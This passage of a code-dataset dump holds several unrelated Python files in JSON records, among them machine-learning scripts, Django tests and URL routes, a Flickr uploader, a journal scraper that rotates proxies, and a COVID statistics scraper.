[]\nfor x in np.array(csvData[:,4]):\n prices.append([x])\ndataNoPrices = np.array(csvData[:,:4]).astype(dtype=np.float32)\nprices = np.array(prices).astype(dtype=np.float32)\n\n#data from userbenchmark.com\n#intel -> 1, AMD ->0\n#data is [make, cores, thread, clock rate]\n#train first 60 data points\nx_train = dataNoPrices[:60]\ny_train = prices[:60]\n\n#evaluate the next group\nx_eval = dataNoPrices[61:len(dataNoPrices) - 1]\ny_eval = prices[61:len(prices) - 1]\n\n#print out prediction on last data point\n\nx_prediction = np.array([dataNoPrices[len(dataNoPrices) - 1]])\ny_prediction = prices[len(prices) - 1]\n\n\n\ninputFN = tf.contrib.learn.io.numpy_input_fn({\"x\":x_train}, y_train, batch_size=4, num_epochs=1000)\nevalInputFN = 
tf.contrib.learn.io.numpy_input_fn({\"x\":x_eval}, y_eval, batch_size=4, num_epochs=1000)\npredictionFN = tf.contrib.learn.io.numpy_input_fn({\"x\":x_prediction}, y_prediction, batch_size=1,num_epochs=1000)\n\nestimator.fit(input_fn=inputFN, steps=1000)\n\n# Evaluation\ntrain_loss = estimator.evaluate(input_fn=inputFN)\neval_loss = estimator.evaluate(input_fn=evalInputFN)\nprint(\"train loss: %r\"% train_loss)\nprint(\"eval loss: %r\"% eval_loss)\niterablePredictions = estimator.predict(input_fn=predictionFN)\npredictions = list(itertools.islice(iterablePredictions, len(x_prediction)))\nprint (\"Prediction: {}\".format(str(predictions)))\nprint(\"Actual -> %r\"% y_prediction)\n\n","sub_path":"cpu_linear_predictor.py","file_name":"cpu_linear_predictor.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"274353786","text":"# http://scikit-learn.sourceforge.net/0.6/auto_examples/applications/plot_face_recognition.html\n\nimport sys\nimport os\n\n# set working directory\nif sys.platform == 'win32':\n\tos.chdir('C:/Users/LUIJK01/Documents/GitHub/FaceRecognition')\nelse:\n\tos.chdir('/Users/rluijk/Documents/GitHub/FaceRecognition')\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\n\n# read data\nx_train = np.loadtxt('data/x_train_pca.csv', delimiter = ',')\nx_test = np.loadtxt('data/x_test_pca.csv', delimiter = ',')\ny_train = np.loadtxt('data/y_train.csv', delimiter = ',')\ny_test = np.loadtxt('data/y_test.csv', delimiter = ',')\n\n# parameters\nparams = {\n 'C' : 10**np.linspace(-8, -4, num = 50)\n}\n\n# initialize object\nclf = GridSearchCV(estimator = SVC(kernel = 'linear'), param_grid = params, cv = 5)\n\n# fit data\nclf.fit(x_train, y_train)\n\n# best parameters\nprint(clf.best_params_)\n\n# all parameters and accuracies\ndf = pd.DataFrame({\n 'C': [x['C'] for x in clf.cv_results_['params']],\n 'score': clf.cv_results_['mean_test_score']\n})\nprint(df)\nsns.pointplot(x = 'C', y = 'score', data = df)\n\n# predict test set\nypred = clf.predict(x_test)\nprint(classification_report(y_pred = ypred, y_true = y_test)) # 0.8\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"122119843","text":"# coding: utf-8\n\n# Standard Python libraries\nfrom datetime import date\n\n# https://github.com/usnistgov/atomman\nimport atomman.lammps as lmp\n\ndef test_lammps_versions(commands):\n \"\"\"\n Tests the primary and alternative lammps commands listed in the loaded \n commands file. Only works when called on the machine where the executables\n are accessible, i.e. 
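# The C grid in svm.py above is logarithmic: 10**np.linspace(-8, -4) spaces the candidate
# values evenly in the exponent rather than in magnitude. A quick check:
import numpy as np

grid = 10 ** np.linspace(-8, -4, num=5)
print(grid)  # [1.e-08 1.e-07 1.e-06 1.e-05 1.e-04]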
don't use if preparing on a different resource!\n Issues an error if the primary lammps command is inaccessible or too old.\n Ignores alternate lammps commands if they are inaccessible or not in the\n required date range.\n \n lammps_command - must be 30 Oct 2019 or newer.\n lammps_command_snap_1 - must be between 8 Aug 2014 and 30 May 2017.\n lammps_command_snap_2 - must be between 3 Dec 2018 and 12 Jun 2019.\n lammps_command_old - must be before 30 Oct 2019.\n\n Parameters\n ----------\n commands : dict\n The mpi and lammps commands to use when preparing.\n \"\"\"\n \n # Test main LAMMPS command\n lammps_command = commands['lammps_command']\n lammpsdate = lmp.checkversion(lammps_command)['date']\n assert lammpsdate >= date(2019, 10, 30)\n\n # Define test for older LAMMPS commands\n def test_old(commands, key, startdate=None, enddate=None):\n if key in commands:\n command = commands[key]\n else:\n return True\n\n try:\n lammpsdate = lmp.checkversion(command)['date']\n except:\n print(f'{key} not found or not working')\n else:\n if startdate is not None and lammpsdate < startdate:\n print(f'{key} too old')\n elif enddate is not None and lammpsdate > enddate:\n print(f'{key} too new')\n else:\n return True\n return False\n\n # Test older LAMMPS commands\n if not test_old(commands, 'lammps_command_snap_1', date(2014, 8, 8), date(2017, 5, 30)):\n del commands['lammps_command_snap_1']\n if not test_old(commands, 'lammps_command_snap_2', date(2018, 12, 3), date(2019, 6, 12)):\n del commands['lammps_command_snap_2']\n if not test_old(commands, 'lammps_command_old', None, date(2019, 10, 30)): \n del commands['lammps_command_old']","sub_path":"iprPy/workflow/test_lammps_versions.py","file_name":"test_lammps_versions.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"241316891","text":"#74. Suppose you have a multiplication table that is N by N. 
That is, a 2D array where the value at the i-th row and j-th column is (i + 1) * (j + 1) (if 0-indexed) or i * j (if 1-indexed).\n\n# Given integers N and X, write a function that returns the number of times X appears as a value in an N by N multiplication table.\n\ndef multiplicationTable(n, x):\n # generate blank multiplication table:\n table = []\n for i in range(n):\n temp_list = []\n for j in range(n):\n temp_list.append(0)\n table.append(temp_list)\n\n # alter first row\n for i in range(n):\n table[0][i] = (i+1)\n\n # alter first column\n for i in range(n):\n table[i][0] = (i+1)\n\n # fill blank spaces in table\n i = 0\n while i < (n - 1):\n j = 0\n while j < (n - 1):\n table[i + 1][j + 1] = table[0][i + 1] * table[j + 1][0]\n j += 1\n i += 1\n\n # count number of appearances of x\n count = 0\n for i in table:\n for j in i:\n if j == x:\n count += 1\n\n return count\n\nprint(multiplicationTable(6, 12))\n","sub_path":"daily_coding_problem/problem74.py","file_name":"problem74.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"523582717","text":"from django.db import models\n\nfrom ..managers import SafeDeleteManager, SafeDeleteQueryset\nfrom ..models import SafeDeleteModel\n\n\nimport pytest\npytestmark = pytest.mark.django_db\n\nclass CustomQuerySet(SafeDeleteQueryset):\n\n def green(self):\n return self.filter(\n color='green'\n )\n\n\nclass CustomManager(SafeDeleteManager):\n _queryset_class = CustomQuerySet\n\n def green(self):\n \"\"\"Implemented here so ``green`` available as manager's method\n \"\"\"\n return self.get_queryset().green()\n\n\nchoices = (\n ('red', \"Red\"),\n ('green', \"Green\"),\n)\n\n\nclass CustomQuerySetModel(SafeDeleteModel):\n color = models.CharField(\n max_length=5,\n choices=choices\n )\n\n objects = CustomManager()\n\n # other manager to test custom QS using ``SafeDeleteManager.__init__``\n other_objects = SafeDeleteManager(CustomQuerySet)\n\ndef test_custom_queryset_original_behavior():\n \"\"\"Test whether creating a custom queryset works as intended.\"\"\"\n CustomQuerySetModel.objects.create(\n color=choices[0][0]\n )\n CustomQuerySetModel.objects.create(\n color=choices[1][0]\n )\n\n assert CustomQuerySetModel.objects.count() == 2\n assert CustomQuerySetModel.objects.green().count() == 1\n\ndef test_custom_queryset_custom_method():\n \"\"\"Test custom filters for deleted objects\"\"\"\n instance = _create_green_instance()\n instance.delete()\n\n deleted_only = CustomQuerySetModel.objects.deleted_only()\n\n # ensure deleted instances available\n assert deleted_only.count() == 1\n\n # and they can be custom filtered\n assert deleted_only.green().count() == 1\n\ndef test_custom_queryset_without_manager():\n \"\"\"Test whether custom queryset may be used without custom manager\n \"\"\"\n instance = _create_green_instance()\n instance.delete()\n\n # note that ``other_objects`` manager used\n deleted_only = CustomQuerySetModel.other_objects.deleted_only()\n\n # ensure deleted instances available\n assert deleted_only.count() == 1\n\n # and they can be custom filtered\n assert deleted_only.green().count() == 1\n\ndef _create_green_instance():\n \"\"\"Shortcut for creating instance with ``color == green``\n \"\"\"\n return 
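# The table-building solution above is O(N^2) in time and memory. Every table entry is
# i * j with 1 <= i, j <= N, so counting X only needs the divisors of X; a sketch:
def multiplication_count(n, x):
    # count pairs (i, x // i) where both factors fit inside the N x N table
    return sum(1 for i in range(1, n + 1) if x % i == 0 and x // i <= n)

print(multiplication_count(6, 12))  # 4, matching the table-based answer above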
CustomQuerySetModel.objects.create(color=choices[1][0])\n","sub_path":"safedelete/tests/test_custom_queryset.py","file_name":"test_custom_queryset.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442771836","text":"from rest_framework.request import clone_request\n\ndef _check_arrays_for_method(serializers, method=None, action=None):\n for item in serializers:\n if isinstance(item, tuple):\n # if have tuple like (\"POST\", \"PUT\") or (\"list\", \"retrieve\")\n if (method in item) or (action in item):\n return item\n else:\n # if we have (i hope) string like \"GET\" or \"update\"\n if (method == item) or (action == item):\n return item\n\n return None\n\n\ndef _get_serializer_class(instance):\n\n _action = getattr(instance, 'action', None)\n _method = instance.request.method\n _serializers = instance.serializers\n\n _temp = _check_arrays_for_method(_serializers, _method, _action)\n\n if _temp is not None:\n serializer_name = _temp\n elif 'default' in _serializers:\n serializer_name = 'default'\n else:\n raise KeyError('No default serializer for %s and %s' % (_action, _method))\n\n return _serializers.get(serializer_name)\n\n\nclass MultiSerializerMixin(object):\n\n def get_serializer_class(self):\n return _get_serializer_class(self)\n\ndef _nested(self_instance, read_only=None, action=None, method=None):\n\n original_request = self_instance.request\n\n if read_only:\n assert action is None and method is None, \\\n 'No `method` and/or `action` params allowed when passing `read_only` = True'\n\n method = 'GET'\n action = 'retrieve'\n\n if method is None:\n method = original_request.method\n\n request_copy = clone_request(original_request, method)\n\n return {\n \"action\": action,\n \"request\": request_copy, # returning copy of readonly request\n \"kwargs\": self_instance.kwargs\n }","sub_path":"taskboard/common/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532714622","text":"import argparse\nimport yaml\nimport logging\nfrom ubm.setup_logging import setup_logging\nfrom ubm.local_loader import LocalLoader\nfrom ubm.flickr_uploader import FlickrUploader\n\n# Setup global logging\nsetup_logging()\n\n\nclass Ubm(object):\n\n def __init__(self, loader, uploader):\n self.logger = logging.getLogger(__name__)\n self.loader = loader\n self.uploader = uploader\n\n def upload(self, root_path):\n self.uploader.upload(self.loader.load(root_path))\n\n\ndef main(args=None):\n logger = logging.getLogger(__name__)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--conf\",\n required=True,\n help=\"configuration file\")\n if args is not None:\n args = parser.parse_args(args)\n else:\n args = parser.parse_args()\n\n with open(args.conf, 'r') as conf_file:\n conf = yaml.load(conf_file)\n\n loader = LocalLoader(FlickrUploader.SUPPORTED_IMAGE_FILE_TYPES)\n uploader = FlickrUploader(conf['flickr']['client_key'],\n conf['flickr']['client_secret'],\n conf['flickr']['resource_owner_key'],\n conf['flickr']['resource_owner_secret'])\n ubm = Ubm(loader, uploader)\n ubm.upload(conf['root_path'])\n# config= None\n# for loc in os.curdir, os.path.expanduser(\"~\"), \"/etc/myproject\", os.environ.get(\"MYPROJECT_CONF\"):\n# try: \n# with open(os.path.join(loc,\"myproject.conf\")) as source:\n# config.readfp( source )\n# except IOError:\n# pass\nif __name__ == '__main__':\n 
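# A usage sketch for the MultiSerializerMixin above: `serializers` may key on an action
# name, an HTTP method, a tuple of either, or 'default'. TaskViewSet and the stub
# serializers are hypothetical names invented for this example; it assumes Django REST
# Framework is installed and the mixin above is in scope.
from rest_framework import serializers, viewsets

class TaskReadSerializer(serializers.Serializer):   # stub serializer for the demo
    name = serializers.CharField()

class TaskWriteSerializer(serializers.Serializer):  # stub serializer for the demo
    name = serializers.CharField()

class TaskViewSet(MultiSerializerMixin, viewsets.ModelViewSet):
    serializers = {
        'default': TaskReadSerializer,                # fallback
        ('list', 'retrieve'): TaskReadSerializer,     # matched via the view action
        ('POST', 'PUT'): TaskWriteSerializer,         # matched via the HTTP method
    }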
main()\n","sub_path":"ubm/ubm.py","file_name":"ubm.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58077980","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport glob\nimport os\n\nos.chdir('Pictures')\nfruitTypes = os.listdir(\".\")\n# print(fruitTypes)\nos.chdir('..')\n\n\ndef prepare_X_Y(path):\n lbl = 0\n fruitList = glob.glob(path+fruitTypes[0]+'/*')\n # print(fruitList)\n # print('\\n\\n')\n fruits = np.array([np.array(cv2.resize(cv2.imread(fruit),(100,100))) for fruit in fruitList])\n x_y = np.array([[img,lbl] for img in fruits])\n # print(x_y.shape)\n lbl += 1\n rest = fruitTypes[1:]\n # print(rest)\n for f in rest:\n # print(f)\n fruitList = glob.glob(path + f + '/*')\n # print(fruitList)\n fruits = np.array([np.array(cv2.resize(cv2.imread(fruit),(100,100))) for fruit in fruitList])\n x_y = np.vstack((x_y,np.array([[img,lbl] for img in fruits])))\n # print(x_y.shape)\n lbl += 1\n # print(x_y.shape)\n # print x_y[:,1]\n np.random.shuffle(x_y)\n return x_y\nx_y_train = prepare_X_Y('Pictures/')\nx_y_test = prepare_X_Y('Validation/')\nfor i in range(36):\n plt.subplot(6,6,i+1,xticks=[],yticks=[])\n plt.imshow(x_y_train[i,0][:,:,[2,1,0]],interpolation='nearest',aspect='auto')\nplt.show()\n\n\nx_y_train = x_y_train\nx_y_test = x_y_test\n#\n# print(x_y_train.shape)\n# print(x_y_test.shape)\n\ndef divide_img_lbl(data):\n \"\"\" split data into image and label\"\"\"\n x = []\n y = []\n for [item,lbl] in data:\n x.append(item)\n y.append([lbl])\n x = np.array(x)\n y = np.array(y)\n return x,y\n\nx_train,y_train = divide_img_lbl(x_y_train)\n\n# print(x_train.shape)\n# print(y_train.shape)\n\nx_test,y_test = divide_img_lbl(x_y_test)\n\nprint(x_test.shape)\nprint(y_test.shape)\n\n# rescale [0,255] --> [0,1]\nx_train = x_train[0:10000].astype('float32')/255\nx_test = x_test[0:10000].astype('float32')/255\ny_train = y_train[0:10000]\ny_test = y_test [0:10000]\n# print x_train[0]\nbins = np.arange(0,36)\nlbl = fruitTypes\n# import seaborn as sns\n# sns.set()\n# plt.hist(y_train,bins,ec='black')\n# plt.xlabel('Labels')\n# plt.ylabel('Frequency')\n# plt.xticks(bins,lbl)\n# plt.show()\nimport keras\n\n# one Hot_Encoding\n# print y_train\nnum_classes = len(fruitTypes)\n# print len(y_train)\n# print y_train.max(),y_train.min()\n# print y_test.max(),y_test.min()\n# print num_classes\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n\n# break trainset into trainset and validationset\n#take first 80% as train and 20% as validation\nuptill = int(len(x_train)*0.8)\n(x_train,x_valid) = x_train[:uptill],x_train[uptill:]\n(y_train,y_valid) = y_train[:uptill],y_train[uptill:]\n\nprint(x_train.shape)\nprint(x_valid.shape)\nprint(y_train.shape)\nprint(y_valid.shape)\n\n\n# create the model\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Flatten,Dense,Dropout\n\nmodel2 = Sequential()\nmodel2.add(Conv2D(filters = 
16,kernel_size=2,padding='same',activation='relu',input_shape=(100,100,3)))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=32,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=64,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=128,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\n\nmodel2.add(Dropout(0.2))\nmodel2.add(Flatten())\nmodel2.add(Dense(1000,activation='relu'))\nmodel2.add(Dropout(0.2))\nmodel2.add(Dense(1200,activation='relu'))\nmodel2.add(Dropout(0.2))\nmodel2.add(Dense(1000,activation='relu'))\nmodel2.add(Dropout(0.2))\n\n\nmodel2.add(Dense(3,activation='softmax'))\n# model2.summary()\n\n#compile the model\nmodel2.compile(loss='mean_squared_error', optimizer='rmsprop',metrics=['accuracy'])\nfrom keras.callbacks import ModelCheckpoint\n# checkpointer = ModelCheckpoint(filepath='modelFruit.weights.best.hdf5', verbose=1,\n# save_best_only=True)\n# hist = model2.fit(x_train,y_train,batch_size=32,epochs=100,validation_data=(x_valid,y_valid),callbacks=[checkpointer],verbose=2,shuffle=True)\n\n# load weight with best validation score\nmodel2.load_weights('modelFruit.weights.best.hdf5')\n\nscore = model2.evaluate(x_test,y_test,verbose=0)\nprint('test accuracy',score[1])\n\nLabels = fruitTypes\nprint(Labels)\nprint(x_test.shape)\ny_hat = (model2.predict(x_test))\nfor i in range(25):\n plt.subplot(5,5,i+1,xticks=[],yticks=[])\n plt.imshow(np.squeeze(x_test[i][:,:,[2,1,0]]))\n pred_idx = np.argmax(y_hat[i])\n true_idx = np.argmax(y_test[i])\n plt.title(\"{} ({})\".format(Labels[pred_idx],Labels[true_idx] ),color=(\"green\" if pred_idx == true_idx else \"red\"))\n# plt.tight_layout()\nplt.show()\n","sub_path":"ClassifyFruit.py","file_name":"ClassifyFruit.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"124804638","text":"from main import *\r\nclass Bullet(object):\r\n\tdef __init__(self, x,y, speed=8 ):\r\n\t\tself.x=x\r\n\t\tself.y=y\r\n\t\tself.speed=speed\r\n\r\n\tdef move(self):\r\n\t\tself.x+= self.speed\r\n\t\tif self.x <= display_width:\r\n\t\t\tdisplay.blit(shot_img, (self.x,self.y))\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494087837","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport time\nimport csv\nimport requests\nimport random\nfrom FreeProxy.proxytool import proxytool\nfrom fake_useragent import UserAgent\n\ndef get_ip():\n ip_list = proxytool().get(num=1)\n ip_touple = ip_list[0]\n ip_head = ip_touple[0]\n ip_last = ip_touple[1]\n proxy_info = {'host': ip_head, 'port': ip_last}\n return proxy_info\n\ndef get(str,csv_write,HEADERS,out,proxy_info):\n\trow = []\n\tresult_req = requests.get(str, headers=HEADERS,proxies=proxy_info)\n\tresultsoup = BeautifulSoup(result_req.text, features='lxml')\n\ttitle = resultsoup.find('h1', {\"class\":\"ArticleTitle\"})\n\tauthors = resultsoup.find_all('span', {\"class\":\"authors__name\"})\n\tabstract_a = resultsoup.find('p', {\"class\":\"Para\"})\n\ttime = resultsoup.find_all('time')\n\tif title is None :\n\t\ttitle = 'null'\n\t\trow.append(title)\n\telse:\n\t\trow.append(title.get_text())\n\tif len(authors) ==0 
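# ClassifyFruit.py above one-hot encodes labels with keras.utils.to_categorical; the same
# transform in plain numpy, for intuition. (Note that the final Dense(3) layer above only
# matches num_classes when exactly three fruit folders are present.)
import numpy as np

labels = np.array([0, 2, 1])
num_classes = 3
one_hot = np.eye(num_classes)[labels]
print(one_hot)
# [[1. 0. 0.]
#  [0. 0. 1.]
#  [0. 1. 0.]]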
:\n\t\tauthor_list = 'null'\n\t\trow.append(author_list)\n\telse:\n\t\tauthor_list = authors[0].get_text()\n\t\tfor j in range(1,len(authors)):\n\t\t\tauthor_list=author_list+' '+authors[j].get_text()\n\t\trow.append(author_list)\n\tif len(time)<2:\n\t\ttime = 'null'\n\t\trow.append(time)\n\telse:\n\t\trow.append(time[1].get_text())\n\tif abstract_a is None :\n\t\tabstract_a = 'null'\n\t\trow.append(abstract_a)\n\telse:\n\t\trow.append(abstract_a.get_text())\n\tprint(row)\n\tcsv_write.writerow(row)\n\tout.flush()\n\ndef if_have_next(Volumeurl,HEADERS,proxies2):\n\tVolume_req = requests.get(Volumeurl[-1], headers=HEADERS,proxies=proxies2)\n\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\tnext = Volumesoup.find('a',{'class':'next'})\n\treturn next\n\n\n# url获取\n\n\nif __name__ == '__main__':\n\t\n\tbaseurl=\"https://link.springer.com\"\n\tua = UserAgent()\n\tua = ua.random\n\tHEADERS = {\"User-Agent\":ua}\n\tout=open(\"/home/cbq/Desktop/scapiy/Hydrodynamics.csv\",'a',newline='')\n\tcsv_write=csv.writer(out,dialect='excel')\n\tArticle_sort = []\n\t# (31) 30 22\n\tcount = 0\n\tproxies2 = get_ip()\n\t#for i in range (25,22,-1):\n\t#\tfor j in range(1,6):\t\n\tVolumeurl = []\n\tfirstone = 'https://link.springer.com/journal/42241/31/1'\n\tVolumeurl.append(firstone)\n\tnext = firstone\n\t#count = count+1\n\t\t\t#if count % 5 == 0:\n\t\t\t#\tproxies2 = get_ip()\n\t\t\t#else:\n\t\t\t#\tpass\n\twhile next is not None:\t\n\t\tnext = if_have_next(Volumeurl,HEADERS,proxies2)\n\t\tif next is None:\n\t\t\tcontinue\n\t\telse:\n\t\t\tVolumeurl.append(baseurl+next.get('href'))\n\tif len(Volumeurl) > 1:\n\t\tfor t in Volumeurl:\n\t\t\tVolume_req = requests.get(t,headers=HEADERS,proxies=proxies2)\n\t\t\ttime.sleep(0.5)\n\t\t\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\t\t\tArticle = Volumesoup.find_all('h3',{\"class\":\"title\"})\n\t\t\tfor m in Article:\n\t\t\t\tArticleurl = m.find_all('a')\n\t\t\t\tfor a in Articleurl:\n\t\t\t\t\tArticle_sort.append(a.get('href'))\n\telse:\n\t\tVolume_req = requests.get(firstone,headers=HEADERS,proxies=proxies2)\n\t\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\t\tArticle = Volumesoup.find_all('h3',{\"class\":\"title\"})\n\t\tfor m in Article:\n\t\t\tArticleurl = m.find_all('a')\n\t\t\tfor a in Articleurl:\n\t\t\t\tArticle_sort.append(a.get('href'))\n\ttime.sleep(0.5)\n\t\t\t\t\t\n\tnum= 0\n\tproxies3 = get_ip()\n\tfor i in range(0,len(Article_sort)):\n\t\tnum= num+1\n\t\tprint(num)\n\t\turl_art = baseurl+Article_sort[i]\n\t\tprint(url_art)\n\t\tif num % 5 == 0:\n\t\t\tproxies3 = get_ip()\n\t\telse:\n\t\t\tpass\n\t\tget(url_art,csv_write,HEADERS,out,proxies3)\n\t\ttime.sleep(0.5)\n\tprint('over')\n\tout.close()\n","sub_path":"model/scrapy/Hydrodynamics.py","file_name":"Hydrodynamics.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31022219","text":"from django.conf.urls import patterns, url\n\nfrom .views import (\n AccountDetails,\n AccountViewSet,\n AccountCurrentUser,\n AccountTimes,\n AccountAutocomplete,\n)\n\n\nurlpatterns = patterns(\n '',\n url(r'^$', AccountViewSet.as_view(), name='users'),\n url(\n r'^login/$',\n 'django.contrib.auth.views.login', {\n 'template_name': 'accounts/login.html'\n },\n name=\"login\"\n ),\n url(\n r'^me/$',\n AccountCurrentUser.as_view(),\n name='current_user'\n ),\n url(\n r'^logout/$',\n 'django.contrib.auth.views.logout', {\n 'next_page': '/'\n }, name=\"logout\"\n ),\n url(\n 
r'^(?P\\d+)/$',\n AccountDetails.as_view(),\n name='details'\n ),\n url(\n r'^(?P\\d+)/times/(?P\\d{4}-\\d{2}-\\d{2})$',\n AccountTimes.as_view(),\n name='user_times',\n ),\n url(\n r'^autocomplete/$',\n AccountAutocomplete.as_view(),\n name='autocomplete'\n ),\n)\n","sub_path":"tragile/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592376956","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport pandas as pd\r\nimport re\r\nimport datetime\r\nimport os\r\n\r\ndir_path = os.path.dirname(os.path.realpath(__file__)) # get current file path for saving excel to same path later\r\n\r\nurl = \"https://www.worldometers.info/coronavirus/#countries\" # set target url\r\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7' # user agent\r\nheaders = {'User-Agent': user_agent} # add user agent to request header\r\n\r\n# request url content and read / parse response html\r\nrequest = urllib.request.Request(url, None, headers=headers)\r\nresponse = urllib.request.urlopen(request)\r\nhtml = response.read()\r\nsoup = BeautifulSoup(html, \"html.parser\")\r\n\r\n\"\"\"\r\n1st part looks for data only\r\n\"\"\"\r\n\r\ntable = soup.find(\"table\", {\"id\": \"main_table_countries_today\"}) # find table in html\r\nrows = table.findAll(\"td\") # find table content\r\n\r\ntable_cells = [] # define list for table cell content\r\n\r\n# get cell content from table using regular expression and append to list\r\nfor row in rows:\r\n row = str(row)\r\n covid_regex = re.compile(r\">+[+]?\\d*,?\\d*,?\\d*[.]?\\d*\\D*<+\")\r\n reg_result = covid_regex.search(row)\r\n try:\r\n table_cells.append(reg_result.group())\r\n except AttributeError:\r\n table_cells.append(\"EXCEPT ATTRIBUTE ERROR\")\r\n\r\ndata = [] # define list for cleaned table cell content\r\n\r\n# clean and append cell content to list\r\nfor cell in table_cells:\r\n try:\r\n data.append(float(cell.replace(\">\", \"\").replace(\"<\", \"\").replace(\"+\", \"\").replace(\",\", \"\")))\r\n except ValueError:\r\n data.append(cell[1:-1])\r\n\r\ndata = data[:-19] # delete last 13 entries (which are total rows in original table)\r\ndata_array = np.reshape(np.array(data), (-1, 19)) # reshape list to array of size 212 x 11\r\n\r\n# transform array to dataframe and add col names\r\ndf = pd.DataFrame(data_array, columns=[\"ID\", \"Country\", \"Total Cases\", \"New Cases\", \"Total Deaths\", \"New Deaths\",\r\n \"Total Recovered\", \"New Recovered\", \"Active Cases\", \"Serious, Critical\", \"Tot Cases/1M pop\",\r\n \"Deaths/ 1M pop\", \"Total Tests\", \"Tests/ 1M pop\", \"Population\", \"Continent\", \"1 Case every X people\",\r\n \"1 Death every X people\", \"1 Test every X ppl\"])\r\n\r\n\"\"\"\r\n2nd part cleans up country names and saves data to excel\r\n\"\"\"\r\n\r\nctry = df[\"Country\"].tolist() # get country data and save to list\r\nctry_clean = [] # define new list for cleaned data\r\nctry_regex = re.compile(r\">+\\w*-?.?\\s?\\w*\\s?\\w*\\s?\\w*<+\") # define regular expression to extract country name\r\n\r\n# iterate through ist and extract country name based on regex (+ filter for e.g. 
vessels)\r\nfor i in ctry:\r\n reg_result = ctry_regex.search(i)\r\n try:\r\n ctry_clean.append(reg_result.group()[1:-1])\r\n except AttributeError:\r\n ctry_clean.append(\"NO COUNTRY\")\r\ndf[\"Country\"] = ctry_clean # save cleaned country data to df\r\ndf = df[8:-7] # drop unneeded rows (i.e. the aggregated continent rows)\r\ndf.reset_index(inplace=True)\r\ndf.drop([\"Population\", \"index\", \"ID\"], axis = 1, inplace=True)\r\ndf.to_csv(f\"{dir_path}\\\\{datetime.datetime.now().date()} COVID-19 worldwide.csv\", sep=\";\") # save data to excel\r\nprint(f\"Excel printed to {dir_path}!\") # show file location\r\n","sub_path":"COVID_Data_Crawler.py","file_name":"COVID_Data_Crawler.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"521063656","text":"# import math\n# import django\n# print(django.VERSION)\n# print('1. My name is Python.')\n# print('2. My name is Python.')\n# print('3. My name is Python.')\n# m=(1+1j)*(1-1j);\n# print(m);\n# m=math.sin(math.pi/2);\n# print(\"sin(90) = %.*f\" %(2,m));\n# m=math.sqrt(36);\n# print(m);\n\n# coding: utf-8\n\n# Load the required modules\n# import threading\n# import time\n#\n# # First thread\n# def th_1(name ):\n# for i in range (8):\n# print(name)\n# time.sleep (1)\n#\n# # Second thread\n# def th_2(name ):\n# for i in range (3):\n# print('\\t',name)\n# time.sleep (2)\n#\n# # Create the threads\n# t1 = threading.Thread(target=th_1 , args=('Thread -1',))\n# t2 = threading.Thread(target=th_2 , args=('Thread -2',))\n# # Start the threads\n# t1.start ()\n# t2.start ()\n#\n# # Wait for the threads to finish\n# t2.join ()\n# print ('\\tThread -2 ended')\n# t1.join ()\n# print('Thread -1 ended')\n\nprint(\"x+3\")\ndef foo():\n return 18\nb=foo()\nprint('x = %d' %b)\nname = input('input your own name: \\r\\n');\nprint(\"Well, hello \", name)\n\nperson = input('Enter your name: ')\ngreeting = 'Hello, {}!'.format(person)\nprint(greeting)\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"385506021","text":"from tba import 